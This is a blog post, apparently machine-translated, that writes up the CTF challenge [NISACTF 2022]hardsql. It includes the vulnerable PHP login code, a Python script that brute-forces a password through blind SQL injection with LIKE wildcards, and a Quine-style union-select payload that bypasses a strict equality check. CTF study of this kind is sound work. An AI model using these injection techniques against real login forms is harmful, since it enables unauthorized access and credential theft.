当前位置：网站首页>Quine injection of SQL injection

Quine injection of SQL injection

2022-07-19 01:26:00 【Aiwin-Lau】

Tips ： When the article is finished , Directories can be generated automatically , How to generate it, please refer to the help document on the right

Catalog

Preface

One 、Quine What is it? ？

Two 、[NISACTF 2022]hardsql

Preface

Tips ： Here you can add the general content to be recorded in this article ：

SQL There are many ways to inject , Do it today CTF When it comes to the question , I met another kind of injection that is not often tested but very detailed , Make a note of .

Tips ： The following is the main body of this article , The following cases can be used for reference

One 、Quine What is it? ？

Quine Refers to self generating program , To put it simply , It's the input sql The statement is consistent with the one to be output , Here's an example .

Two 、[NISACTF 2022]hardsql

Topic tips ：

$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";

1, Enter the topic ：

The title says that the login account is bilala, Only login passwords are injectable points , The first step is to log in , Make some small attempts at conventional injection , found waf Filtered spaces ,and,updatexml,=,database,sleep,information_schema And so on. , A lot of filtering . You can use like+ wildcard % Blow up the password , The blasting script is as follows ：

import requests

url = 'http://1.14.71.254:28860/login.php'
str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
flag = ''
for i in range(62):
    for j in str:
        data = {
            'username': 'bilala', "passwd":f"-1'/**/or/**/passwd/**/like/**/'{flag+j}%'#"
        }
        response = requests.post(url, data=data)
        if "nothing found" not  in response.text:
            flag = flag + j
            print(flag)
            break
print(flag)

After logging in , See the source code :

 <?php
// Add a billion more filtering 

include_once("config.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
        alertMes('waf here', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
    $username=$_POST['username'];
    $password=$_POST['passwd'];
    if ($username !== 'bilala') {
        alertMes('only bilala can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
    $user_result=mysqli_query($MysqlLink,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes('nothing found','index.php');
    }
    if ($row['passwd'] === $password) {
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

?>

The key idea to solve the problem is :

  if ($row['passwd'] === $password) { # The key 
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

Found out passwd Want to be with $password Strong equality , And $passwor It's not equal to b2f2d15b3ae082ca29697d8dcd420fd7.

But in fact, this table is actually an empty table , Only construct statements with exactly the same input and output , To get around the restrictions FLAG, Mainly used replace(str,old_string,new_string) Construct , The construction idea is as follows :

select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

utilize 'replace(".",char(46),".")'); Replace 'replace(".",char(46),".")' Symbols in .

The result of input and output is :

replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');

replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") ;

In this way, the consistency between input and output has not been achieved , Because there is also inconsistency between single quotation marks and double quotation marks , So we should solve the problem of single and double quotation marks , One more layer replace, Replace double quotation marks with single quotation marks , as follows ：

replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

The output result is :

replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')

In this way, the input and output results are consistent .

The question also filters char, use chr Or directly 0x Instead of just .

So the final payload by :

username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#&login=%E7%99%BB%E5%BD%95